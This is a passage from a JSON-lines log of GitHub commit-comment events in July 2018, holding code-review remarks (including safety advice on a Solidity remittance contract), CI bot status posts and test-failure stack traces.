test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T09:54:24Z"}
{"id":"7969676852","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29718014,"position":30,"line":28,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T09:54:45Z","updated_at":"2018-07-16T09:54:45Z","author_association":"NONE","body":"I know that you use `ethFunds` as an indicator that the password has already been used. It is a valid concern but you should shift this test on another field.\r\nYou see, if you have a `used` field, and the developer forgets to check it was previously used, there are only 1 or 2 people's money at risk. But if the developer forgets to check `processed` as per the previous comment, then it is everybody's money that is at risk."}},"created_at":"2018-07-16T09:54:45Z"}
{"id":"7969677906","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718017,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-16T09:54:59Z","updated_at":"2018-07-16T09:54:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T09:54:59Z"}
{"id":"7969680690","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718021,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-16T09:55:35Z","updated_at":"2018-07-16T09:55:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T09:55:35Z"}
{"id":"7969680722","type":"CommitCommentEvent","actor":{"login":"Johnnynator"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29718022,"position":null,"line":null,"path":null,"commit_id":"50bfe7639daff0fdecfa23ce072f43d4744899ee","created_at":"2018-07-16T09:55:35Z","updated_at":"2018-07-16T09:55:35Z","author_association":"CONTRIBUTOR","body":"This broke sddm for me with i965_dri xorg driver on x86_64-musl. (maybe also other stuff).\r\nProbably related to https://github.com/void-linux/void-packages/issues/921.\r\nAlso it seems like 18.1.3 did break some stuff already which I didn't notice before."}},"created_at":"2018-07-16T09:55:35Z"}
{"id":"7969681484","type":"CommitCommentEvent","actor":{"login":"SimonVrouwe"},"repo":{"name":"ElementsProject/lightning"},"payload":{"comment":{"id":29718024,"position":null,"line":null,"path":null,"commit_id":"f2ffb6d03eb769b7327f322dcaad27c1a75221e2","created_at":"2018-07-16T09:55:45Z","updated_at":"2018-07-16T09:55:45Z","author_association":"CONTRIBUTOR","body":"So we first need to fix #1698"}},"created_at":"2018-07-16T09:55:45Z"}
{"id":"7969686100","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718030,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-16T09:56:44Z","updated_at":"2018-07-16T09:56:44Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T09:56:44Z"}
{"id":"7969687591","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29718031,"position":101,"line":71,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T09:57:03Z","updated_at":"2018-07-16T09:57:03Z","author_association":"NONE","body":"This is laudable. What you want to do is make the password usable again.\r\nWhat is uncertain however is whether a tx was already sent but failed because of out of gas, or the payee reverted or some other reason. In which case the `sendRemittance` never completed but the password is already public knowledge. So allowing the password again is a false economy."}},"created_at":"2018-07-16T09:57:03Z"}
{"id":"7969688018","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29718032,"position":22,"line":19,"path":"src/main/java/abc/ListUnitTaskResults.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T09:57:09Z","updated_at":"2018-07-16T09:57:09Z","author_association":"COLLABORATOR","body":"REwrite it in a way: PrintManager.printList(students)"}},"created_at":"2018-07-16T09:57:09Z"}
{"id":"7969689215","type":"CommitCommentEvent","actor":{"login":"mwojtkowski"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29718033,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-16T09:57:23Z","updated_at":"2018-07-16T09:57:23Z","author_association":"OWNER","body":"thanks I didn't know about ```/ovale refresh``` ( didn't look into AddRefreshInterval function )\r\n\r\nthis is what I use in my local copy\r\n```\r\nlet guid = OvaleGUID.UnitGUID(\"target\") || OvaleGUID.UnitGUID(\"focus\");\r\nthis.timeSinceLastUpdate = this.timeSinceLastUpdate + elapsed;\r\nlet refresh = OvaleDebug.trace || this.visible && (this.timeSinceLastUpdate > Ovale.db.profile.apparence.minFrameRefresh / 1000 && next(Ovale.refreshNeeded) || guid && this.timeSinceLastUpdate > Ovale.db.profile.apparence.maxFrameRefresh / 1000 );\r\n```\r\nI still use maxFrameRefresh because after we removed refreshNeeded from Health.ts and changed refresh in Power to UNIT_POWER_UPDATE instead of UNIT_POWER_FREQUENT so there can be situation where refreshNeeded won't trigger for more than 250ms.\r\n\r\nwith above modification on target dummy ( after about 2min combat settings min=50 max=250)\r\nOvale: Refresh intervals: count = 500, avg = 142, min = 50, max = 272 (ms)\r\n\r\nalso fixed bug in /ovale refresh when there is no refresh data\r\n\r\nI would change minFrameRefresh to 50-100 range max to 100-400. \r\nI've tried values below 50 and it was painful with previous settings with forced minRefresh ( even with i7 8700k )\r\n\r\nI will concentrate on updating spell definitions now"}},"created_at":"2018-07-16T09:57:23Z"}
{"id":"7969690651","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29718036,"position":30,"line":28,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T09:57:41Z","updated_at":"2018-07-16T09:57:41Z","author_association":"NONE","body":"And when I say a field `.processed`, I expect you to find something that is gas cheap. Of course ;)"}},"created_at":"2018-07-16T09:57:41Z"}
{"id":"7969691655","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718037,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-16T09:57:54Z","updated_at":"2018-07-16T09:57:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T09:57:54Z"}
{"id":"7969691785","type":"CommitCommentEvent","actor":{"login":"ccoloma"},"repo":{"name":"koliseoapi/koliseo-agenda"},"payload":{"comment":{"id":29718038,"position":128,"line":106,"path":"src/model/AgendaCell.js","commit_id":"68212d0300f8cf014f638930500c580408640bcc","created_at":"2018-07-16T09:57:56Z","updated_at":"2018-07-16T09:57:56Z","author_association":"COLLABORATOR","body":"I think having one method instead of three makes sense (whitout saving it as an attr of CellContents). We can still separate it in three internal methods."}},"created_at":"2018-07-16T09:57:56Z"}
{"id":"7969696701","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29718041,"position":87,"line":66,"path":"contracts/Remittance.sol","commit_id":"2407d12858299f342f1021371e2a4da9b1e8f5a7","created_at":"2018-07-16T09:58:55Z","updated_at":"2018-07-16T09:58:55Z","author_association":"NONE","body":"Case in point, this line is repeated 3 times, in each of the exit functions!"}},"created_at":"2018-07-16T09:58:55Z"}
{"id":"7969697395","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29718046,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-16T09:59:05Z","updated_at":"2018-07-16T09:59:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-16T09:59:05Z"}
{"id":"7969697751","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29718047,"position":null,"line":null,"path":null,"commit_id":"ef865eebc8f4094a5ffc57a1965660d585ecc9cf","created_at":"2018-07-16T09:59:09Z","updated_at":"2018-07-16T09:59:09Z","author_association":"NONE","body":"eigen_HBIRE (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2325 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * Failed: 1\n * OTHER_FAULT: 3\n\nintegration Test Summary\n * Passed: 619\n * Failed: 9\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.44%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ef865eebc8f4094a5ffc57a1965660d585ecc9cf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.04%25-green.png)</a>\n"}},"created_at":"2018-07-16T09:59:09Z"}
{"id":"7969699777","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29718051,"position":4,"line":4,"path":"src/main/java/abc/AverageMarkComparator.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T09:59:34Z","updated_at":"2018-07-16T09:59:34Z","author_association":"COLLABORATOR","body":"StudentsComporator\r\n"}},"created_at":"2018-07-16T09:59:34Z"}
{"id":"7969701515","type":"CommitCommentEvent","actor":{"login":"lianeaster"},"repo":{"name":"Kurchynska/lesson-4"},"payload":{"comment":{"id":29718053,"position":5,"line":5,"path":"src/main/java/abc/AverageMarkComparator.java","commit_id":"f8596df53361f60d6b4550f544a28280041684ab","created_at":"2018-07-16T09:59:56Z","updated_at":"2018-07-16T09:59:56Z","author_association":"COLLABORATOR","body":"compareMark"}},"created_at":"2018-07-16T09:59:56Z"}
{"id":"7973591426","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29728084,"position":null,"line":null,"path":null,"commit_id":"9d2342aa1917e7cb5acb1edd8bb14352187c6d43","created_at":"2018-07-17T00:01:10Z","updated_at":"2018-07-17T00:01:10Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-63](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-63).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-63-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-17T00:01:10Z"}
{"id":"7973592281","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29728088,"position":null,"line":null,"path":null,"commit_id":"9ff00e87a88d2f621b631e33a85bbe242079795e","created_at":"2018-07-17T00:01:28Z","updated_at":"2018-07-17T00:01:28Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-66](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-66).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-66-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-17T00:01:28Z"}
{"id":"7973605014","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29728118,"position":null,"line":null,"path":null,"commit_id":"8362402f7fabf5b60056b909920bdf84e1583310","created_at":"2018-07-17T00:06:04Z","updated_at":"2018-07-17T00:06:04Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-793](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-793).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-793-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-17T00:06:04Z"}
{"id":"7973610452","type":"CommitCommentEvent","actor":{"login":"Nokdef"},"repo":{"name":"Nokdef/Four-Words-Is-Plenty"},"payload":{"comment":{"id":29728123,"position":null,"line":null,"path":null,"commit_id":"d781cac5ce7e5b50bc138f4c70e86a7703797db7","created_at":"2018-07-17T00:08:03Z","updated_at":"2018-07-17T00:08:03Z","author_association":"OWNER","body":"Merging it"}},"created_at":"2018-07-17T00:08:03Z"}
{"id":"7973614485","type":"CommitCommentEvent","actor":{"login":"arima0k"},"repo":{"name":"retr0s4ge/desmume"},"payload":{"comment":{"id":29728132,"position":null,"line":null,"path":null,"commit_id":"6fd23368ce462c2563349eceb833f1ce3cef726e","created_at":"2018-07-17T00:09:31Z","updated_at":"2018-07-17T00:09:31Z","author_association":"NONE","body":"Great job"}},"created_at":"2018-07-17T00:09:31Z"}
{"id":"7973621566","type":"CommitCommentEvent","actor":{"login":"tstfrancis"},"repo":{"name":"suavecode/SUAVE"},"payload":{"comment":{"id":29728140,"position":26,"line":26,"path":"trunk/SUAVE/Input_Output/OpenVSP/vsp_read.py","commit_id":"83abb99b4fee6fd61d9ba0a2ce3ee6193ee831ac","created_at":"2018-07-17T00:12:08Z","updated_at":"2018-07-17T00:12:08Z","author_association":"NONE","body":"can I assume that wings are always made symmetric about the XZ axis or should I allow for possibility that some made it symmetrical about YZ as well?"}},"created_at":"2018-07-17T00:12:08Z"}
{"id":"7973621587","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29728141,"position":null,"line":null,"path":null,"commit_id":"17c724ffe78febd0fb7522e0c5b8c0de478305f8","created_at":"2018-07-17T00:12:08Z","updated_at":"2018-07-17T00:12:08Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [improve score system](https://trello.com/c/2bXV6F4U/20-improve-score-system)"}},"created_at":"2018-07-17T00:12:08Z"}
{"id":"7973623392","type":"CommitCommentEvent","actor":{"login":"tstfrancis"},"repo":{"name":"suavecode/SUAVE"},"payload":{"comment":{"id":29728144,"position":44,"line":44,"path":"trunk/SUAVE/Input_Output/OpenVSP/vsp_read.py","commit_id":"83abb99b4fee6fd61d9ba0a2ce3ee6193ee831ac","created_at":"2018-07-17T00:12:46Z","updated_at":"2018-07-17T00:12:46Z","author_association":"NONE","body":"compute total wing dihedral manually based on segments? vsp does not give overall dihedral."}},"created_at":"2018-07-17T00:12:46Z"}
{"id":"7973623708","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29728148,"position":null,"line":null,"path":null,"commit_id":"d74607edbe2e8bd42620f72e9fda73cc011ebbc7","created_at":"2018-07-17T00:12:54Z","updated_at":"2018-07-17T00:12:54Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 541](https://ci.hashicorp.engineering/viewLog.html?buildId=104483&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-17T00:12:54Z"}
{"id":"7973625831","type":"CommitCommentEvent","actor":{"login":"tstfrancis"},"repo":{"name":"suavecode/SUAVE"},"payload":{"comment":{"id":29728150,"position":22,"line":22,"path":"trunk/SUAVE/Input_Output/OpenVSP/vsp_read.py","commit_id":"83abb99b4fee6fd61d9ba0a2ce3ee6193ee831ac","created_at":"2018-07-17T00:13:40Z","updated_at":"2018-07-17T00:13:40Z","author_association":"NONE","body":"can you think of any need for testing for axial symmetry? I can add but don't see a reason too..."}},"created_at":"2018-07-17T00:13:40Z"}
{"id":"7973626190","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29728151,"position":null,"line":null,"path":null,"commit_id":"fd2c28d35b36d049f497457a9be9eacc152d9a6b","created_at":"2018-07-17T00:13:48Z","updated_at":"2018-07-17T00:13:48Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-68](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-68).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-68-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-17T00:13:48Z"}
{"id":"7973634057","type":"CommitCommentEvent","actor":{"login":"thetabloom"},"repo":{"name":"thetabloom/Idea-Box"},"payload":{"comment":{"id":29728169,"position":null,"line":null,"path":null,"commit_id":"7763641c7f6a73ebab2ae2c04163afe857f743d9","created_at":"2018-07-17T00:16:47Z","updated_at":"2018-07-17T00:16:47Z","author_association":"OWNER","body":"Sara navigated while I drove with this one. It is a rebuild to make the entire page flex. The top part was originally built with pure CSS."}},"created_at":"2018-07-17T00:16:47Z"}
{"id":"7973634843","type":"CommitCommentEvent","actor":{"login":"mbarnes-sb"},"repo":{"name":"fl4re/openCOLLADAtests"},"payload":{"comment":{"id":29728171,"position":12,"line":27,"path":"common/opencollada.py","commit_id":"6f5a37ec635475d4f3704d237521cb779606bb63","created_at":"2018-07-17T00:17:06Z","updated_at":"2018-07-17T00:17:06Z","author_association":"NONE","body":"@RemiArnaud `find_file` returns ```` so I think `is None` never  succeeds and we don't get the error reported in the build."}},"created_at":"2018-07-17T00:17:06Z"}
{"id":"7973636920","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29728177,"position":null,"line":null,"path":null,"commit_id":"d74607edbe2e8bd42620f72e9fda73cc011ebbc7","created_at":"2018-07-17T00:17:56Z","updated_at":"2018-07-17T00:17:56Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 541](https://ci.hashicorp.engineering/viewLog.html?buildId=104483&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:05:02"}},"created_at":"2018-07-17T00:17:56Z"}
{"id":"7973637979","type":"CommitCommentEvent","actor":{"login":"mbarnes-sb"},"repo":{"name":"fl4re/openCOLLADAtests"},"payload":{"comment":{"id":29728181,"position":15,"line":30,"path":"common/opencollada.py","commit_id":"6f5a37ec635475d4f3704d237521cb779606bb63","created_at":"2018-07-17T00:18:20Z","updated_at":"2018-07-17T00:18:20Z","author_association":"NONE","body":"@RemiArnaud and `run` is called with an empty `OpenCOLLADA.validator_path` that we see in the logs"}},"created_at":"2018-07-17T00:18:20Z"}
{"id":"7973639126","type":"CommitCommentEvent","actor":{"login":"ejgallego"},"repo":{"name":"PrincetonUniversity/VST"},"payload":{"comment":{"id":29728185,"position":5,"line":52,"path":"Makefile","commit_id":"70233fdbb676eacd23e14b24dabc8f7ef1e00004","created_at":"2018-07-17T00:18:47Z","updated_at":"2018-07-17T00:18:47Z","author_association":"CONTRIBUTOR","body":"@mansky1 you broke compilation with this line. File `Free` can't be found."}},"created_at":"2018-07-17T00:18:47Z"}
{"id":"7973642458","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29728195,"position":null,"line":null,"path":null,"commit_id":"fd2c28d35b36d049f497457a9be9eacc152d9a6b","created_at":"2018-07-17T00:20:07Z","updated_at":"2018-07-17T00:20:07Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-70](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-70).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-70-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-17T00:20:07Z"}
{"id":"7973643022","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29728197,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-17T00:20:17Z","updated_at":"2018-07-17T00:20:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T00:20:17Z"}
{"id":"7973644677","type":"CommitCommentEvent","actor":{"login":"rlerdorf"},"repo":{"name":"phan/phan"},"payload":{"comment":{"id":29728199,"position":null,"line":null,"path":null,"commit_id":"c15d23f69eb295db4159eec2c520f11568f066ad","created_at":"2018-07-17T00:20:56Z","updated_at":"2018-07-17T00:20:56Z","author_association":"COLLABORATOR","body":"Ah true. I was thrown off by getting this error:\r\n```"}},"created_at":"2018-07-17T00:20:56Z"}
{"id":"7973646042","type":"CommitCommentEvent","actor":{"login":"danielsun1106"},"repo":{"name":"apache/groovy"},"payload":{"comment":{"id":29728201,"position":null,"line":null,"path":null,"commit_id":"a798866fcfd98f7b2cd46e948b37217a8349f609","created_at":"2018-07-17T00:21:30Z","updated_at":"2018-07-17T00:21:30Z","author_association":"MEMBER","body":"Some tests failed. It seems that picocli 3.3.0 is not compatible with 3.2.0\r\n\r\nhttps://travis-ci.org/apache/groovy/jobs/404235362\r\n```\r\n> Task :groovy-cli-picocli:test\r\ngroovy.cli.picocli.CliBuilderTest > testMixedBurstingAndLongOptions FAILED\r\n    junit.framework.AssertionFailedError\r\n        at junit.framework.Assert.fail(Assert.java:55)\r\n        at junit.framework.Assert.assertTrue(Assert.java:22)\r\n        at junit.framework.Assert.assertTrue(Assert.java:31)\r\n        at junit.framework.TestCase.assertTrue(TestCase.java:201)\r\n        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\r\n        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n        at java.lang.reflect.Method.invoke(Method.java:498)\r\n        at org.codehaus.groovy.reflection.CachedMethod.invoke(CachedMethod.java:104)\r\n        at groovy.lang.MetaMethod.doMethodInvoke(MetaMethod.java:326)\r\n        at groovy.lang.MetaClassImpl.invokeStaticMethod(MetaClassImpl.java:1554)\r\n        at org.codehaus.groovy.runtime.callsite.StaticMetaClassSite.callStatic(StaticMetaClassSite.java:64)\r\n        at org.codehaus.groovy.runtime.callsite.CallSiteArray.defaultCallStatic(CallSiteArray.java:55)\r\n        at org.codehaus.groovy.runtime.callsite.AbstractCallSite.callStatic(AbstractCallSite.java:197)\r\n        at org.codehaus.groovy.runtime.callsite.AbstractCallSite.callStatic(AbstractCallSite.java:209)\r\n        at groovy.cli.picocli.CliBuilderTest.testMixedBurstingAndLongOptions(CliBuilderTest.groovy:526)\r\ngroovy.cli.picocli.CliBuilderTest > testLongOptionsRequireDoubleHyphenByDefault FAILED\r\n    junit.framework.AssertionFailedError\r\n        at junit.framework.Assert.fail(Assert.java:55)\r\n        at junit.framework.Assert.assertTrue(Assert.java:22)\r\n        at junit.framework.Assert.assertTrue(Assert.java:31)\r\n        at junit.framework.TestCase.assertTrue(TestCase.java:201)\r\n        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\r\n        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n        at java.lang.reflect.Method.invoke(Method.java:498)\r\n        at org.codehaus.groovy.reflection.CachedMethod.invoke(CachedMethod.java:104)\r\n        at groovy.lang.MetaMethod.doMethodInvoke(MetaMethod.java:326)\r\n        at groovy.lang.MetaClassImpl.invokeStaticMethod(MetaClassImpl.java:1554)\r\n        at org.codehaus.groovy.runtime.callsite.StaticMetaClassSite.callStatic(StaticMetaClassSite.java:64)\r\n        at org.codehaus.groovy.runtime.callsite.CallSiteArray.defaultCallStatic(CallSiteArray.java:55)\r\n        at org.codehaus.groovy.runtime.callsite.AbstractCallSite.callStatic(AbstractCallSite.java:197)\r\n        at org.codehaus.groovy.runtime.callsite.AbstractCallSite.callStatic(AbstractCallSite.java:209)\r\n        at groovy.cli.picocli.CliBuilderTest.testLongOptionsRequireDoubleHyphenByDefault(CliBuilderTest.groovy:920)\r\n```"}},"created_at":"2018-07-17T00:21:30Z"}
